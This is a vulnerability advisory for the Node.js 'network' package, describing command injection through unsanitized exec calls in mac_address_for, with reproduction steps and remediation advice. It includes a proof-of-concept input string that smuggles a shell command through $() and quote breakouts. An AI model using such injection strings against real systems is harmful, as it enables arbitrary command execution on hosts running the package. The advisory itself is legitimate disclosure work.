Cross platform network utilities for Node.js (gateway_ip, MAC address, etc)
Affected versions of this package are vulnerable to arbitrary command injection (CWE-77 [1]). If (attacker-controlled) user input is given to the mac_address_for function of the package, it is possible for an attacker to execute arbitrary commands on the operating system that this package is being run on. This vulnerability is due to use of the child_process exec function without input sanitization. The Node.js API documentation states that unsanitized user input should never be passed to exec [2].

[1] https://cwe.mitre.org/data/definitions/77.html
[2] https://nodejs.org/api/child_process.html#child_process_child_process_exec_command_options_callback
The proof-of-concept code below illustrates the issue. Executing this code will cause the command touch /tmp/success to be executed, leading to the creation of a file called success in the /tmp directory.
var PUT = require('network');
var x0 = " $(touch /tmp/success) # \" || touch /tmp/success # ' || touch /tmp/success";
var x1 = "{}";
new PUT["mac_address_for"](x0,x1);
Environment: Node.js v15.5.0 on Linux

Steps to reproduce:
- Install the affected version: npm i network@0.6.1
- Create a file, poc.js, containing the PoC code.
- Execute the file: node poc.js

A file called success will be created in the /tmp directory as a result of the execution of the PoC.
Remediation:
- Consider using execFile [1] or execFileSync [2] if possible, which do not spawn a shell.
- If possible, consider only passing inputs to exec that match a predefined allow-list.
- If using an allow-list is not possible, consider sanitizing inputs to exec such that they do not contain shell meta-characters such as $().